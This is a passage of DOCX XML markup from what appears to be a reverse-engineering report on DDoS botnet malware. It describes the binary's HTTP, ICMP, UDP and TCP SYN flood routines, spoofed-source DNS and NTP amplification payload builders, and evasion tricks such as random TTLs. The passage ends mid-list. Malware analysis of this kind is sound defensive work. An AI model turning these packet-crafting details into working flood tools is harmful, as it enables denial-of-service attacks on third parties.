          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Sets IP_HDRINCL for crafting custom IP headers</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Uses select() with 5-second timeout for connection state monitoring</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Duration-controlled attack loop</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="3D7AB5"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">HTTP Flood (FUN_00400CA0)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Constructs HTTP requests with format strings referencing ports 0x1BB (443/HTTPS) and 0x50 (80/HTTP)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Uses different request templates for standard vs. SSL targets</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Allocates large payload buffers (FUN_00415314 with 0x400 size)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Supports connection timeouts and retry logic</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="3D7AB5"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">DNS Amplification (FUN_00402060)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Constructs crafted DNS packets for amplification attacks:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Builds IP header with protocol 0x11 (UDP) and TTL 0x80 (128)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Resolves DNS server addresses via FUN_004009D0</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Falls back to hardcoded DNS at </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">DAT_0051CC74</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Constructs DNS query packets with spoofed source IP</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Uses raw socket (SOCK_RAW, protocol 0xFF) for direct IP injection</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="3D7AB5"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">ICMP Raw Packet Flood (FUN_004049b0)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">IP-spoofed raw packet flood with full IP header construction:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Creates raw socket: socket(AF_INET, SOCK_RAW, IPPROTO_RAW) with IP_HDRINCL</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Constructs IPv4 header manually: version 0x45, protocol 0x80, TTL 128</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Fills payload with cyclic pattern from encrypted data buffer (DAT_0051d1e0)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">RFC1918/loopback exclusion: skips 192.168.x.x, 172.16-31.x.x, 127.x.x.x, 169.254.x.x, 224+</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Also supports targeted subnet attacks (configurable via C2 command)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Increments IP identification field per-packet, computes IP and ICMP checksums</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Rate-limited via nanosleep (configurable packets-per-second)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="3D7AB5"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">UDP Flood v2 with PRNG Payload (FUN_004064c0)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Random-payload UDP flood using XorShift128 PRNG:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Creates raw socket with IP_HDRINCL for IP header control</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Generates random payload data using the XorShift128 PRNG state machine (DAT_0051f0a0-ac)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Random TTL value per-packet for evasion</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Same RFC1918 exclusion and subnet targeting as ICMP flood</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Duration and rate controlled</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="3D7AB5"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">TCP SYN Flood with Custom Options (FUN_004069d0)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Sophisticated TCP SYN flood with configurable TCP flags and options:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Flag Parser: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Parses TCP flag string characters: 'f'(FIN), 's'(SYN), 'r'(RST), 'p'(PSH), 'a'(ACK), 'u'(URG)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">SYN+RST mode: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">32-byte TCP options including MSS (0x0584), Window Scale, SACK Permitted, Timestamps</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">SYN-only mode: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">32-byte TCP options with different MSS value (0x05B4)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">No-SYN mode: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">20-byte header only, with optional 0xFF fill for fingerprinting evasion</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Random sequence numbers and window sizes via PRNG</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Random ACK numbers when ACK flag is set</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Random source/destination ports when not specified by C2</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Full TCP pseudo-header checksum computation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="3D7AB5"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">DDoS Payload Builders</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Multiple payload construction functions for amplification attacks:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">FUN_00407360: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">DNS Amplification payload (512 bytes) — Builds DNS query with static header and 499-byte query body, likely an ANY query for maximum amplification</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">FUN_00407580: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">HTTP Request payload (100 bytes) — Constructs HTTP request with method, host, path, and headers from encrypted data sections</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">FUN_00407a90: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">DNS Query payload (74 bytes) — Smaller DNS query variant</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">FUN_00407cb0/FUN_00407ed0: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">DNS Response payloads (56/44 bytes) — Crafted DNS response packets for reflection</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">FUN_00408100/FUN_00408310: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">NTP Monlist payloads (54/42 bytes) — NTP mode 7 monlist queries starting with byte 0x38 for NTP amplification</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">FUN_00408530: </w:t>
      </w:r>
      <w:r>
